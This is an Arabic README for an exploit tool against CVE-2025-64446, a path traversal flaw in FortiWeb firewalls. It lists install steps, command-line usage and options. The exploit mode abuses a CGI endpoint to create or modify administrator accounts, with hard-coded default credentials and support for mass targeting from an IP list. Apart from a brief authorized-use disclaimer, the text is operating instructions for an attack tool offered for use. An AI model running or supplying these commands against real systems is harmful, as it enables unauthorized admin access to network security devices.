
أداة استغلال لثغرة CVE-2025-64446 الخاصة بتجاوز المسار في FortiWeb WAF. تدعم التحقق من الثغرة واستغلال نقطة نهاية CGI لإنشاء أو تعديل حسابات المستخدمين.
أداة استغلال للتحقق من ثغرة CVE-2025-64446 واستغلالها في أجهزة FortiWeb.
تختبر هذه الأداة وتستغل ثغرة اجتياز المسار (Path Traversal) (CVE-2025-64446) في جدران حماية تطبيقات الويب FortiWeb. يمكن استخدامها للتحقق من حالة الثغرة أو استغلال نقطة نهاية CGI لإنشاء/تعديل حسابات المستخدمين.
pip install -r requirements.txt
python3 exploit.py -t <target_ip> --check
python3 exploit.py -t <target_ip> --exploit
python3 exploit.py -t <target_ip> --exploit --username sxy --password sxyrxyadmin1!
python3 exploit.py -l targets.txt --check
أنشئ ملف targets.txt يحتوي على عنوان IP واحد في كل سطر:
192.168.1.100
192.168.1.101
192.168.1.102
-t, --target - عنوان IP الهدف (مطلوب إذا لم يتم استخدام --targets-file)-l, --targets-file - ملف يحتوي على عناوين IP للأهداف (سطر واحد لكل عنوان، مطلوب إذا لم يتم استخدام --target)-p, --port - منفذ الهدف (الافتراضي: 443)--http - استخدام HTTP بدلاً من HTTPS--check - التحقق من الثغرة فقط (للقراءة فقط)--exploit - تنفيذ استغلال نقطة نهاية CGI--username - اسم المستخدم للاستغلال (الافتراضي: sxy)--password - كلمة المرور التي سيتم تعيينها (الافتراضي: sxyrxyadmin1!)--profname - اسم الملف الشخصي (الافتراضي: prof_admin)--vdom - اسم VDOM (الافتراضي: root)--loginname - اسم تسجيل الدخول (الافتراضي: admin)--testpoint-name - اسم نقطة الاختبار/المستخدم الذي سيتم إنشاؤه (الافتراضي: Testpoint)هذه الأداة مخصصة لأغراض البحث الأمني المصرح به والتعليم فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.